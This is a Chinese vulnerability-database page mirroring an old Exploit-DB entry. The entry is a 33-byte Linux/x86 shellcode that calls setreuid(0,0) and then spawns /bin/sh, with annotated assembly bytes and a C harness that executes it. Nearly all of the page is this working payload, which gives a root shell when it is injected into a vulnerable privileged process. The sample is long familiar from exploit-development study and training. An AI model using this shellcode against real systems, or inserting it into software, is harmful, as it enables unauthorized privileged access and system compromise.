Linux/x86 - setreuid(0,0) + execve("/bin/sh", ["/bin/sh", NULL]) Shellcode (33 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055630 漏洞类型
发布时间 2006-04-03 更新时间 2006-04-03
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13379
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * (Linux/x86) setreuid(0,0) + execve("/bin/sh", ["/bin/sh", NULL])
 * - 33 bytes
 * - xgc@gotfault.net
 *
 */

char shellcode[] =

  "\x6a\x46"			// push   $0x46
  "\x58"			// pop    %eax
  "\x31\xdb"			// xor	  %ebx, %ebx
  "\x31\xc9"			// xor	  %ecx, %ecx
  "\xcd\x80"			// int    $0x80

  "\x31\xd2"			// xor    %edx, %edx
  "\x6a\x0b"			// push   $0xb
  "\x58"			// pop    %eax
  "\x52"			// push   %edx
  "\x68\x2f\x2f\x73\x68"	// push   $0x68732f2f
  "\x68\x2f\x62\x69\x6e"	// push   $0x6e69622f
  "\x89\xe3"			// mov    %esp, %ebx
  "\x52"			// push   %edx
  "\x53"			// push   %ebx
  "\x89\xe1"			// mov    %esp, %ecx
  "\xcd\x80";			// int    $0x80
 
int main() {
 
        int (*f)() = (int(*)())shellcode;
        printf("Length: %u\n", strlen(shellcode));
        f();
}

// milw0rm.com [2006-04-03]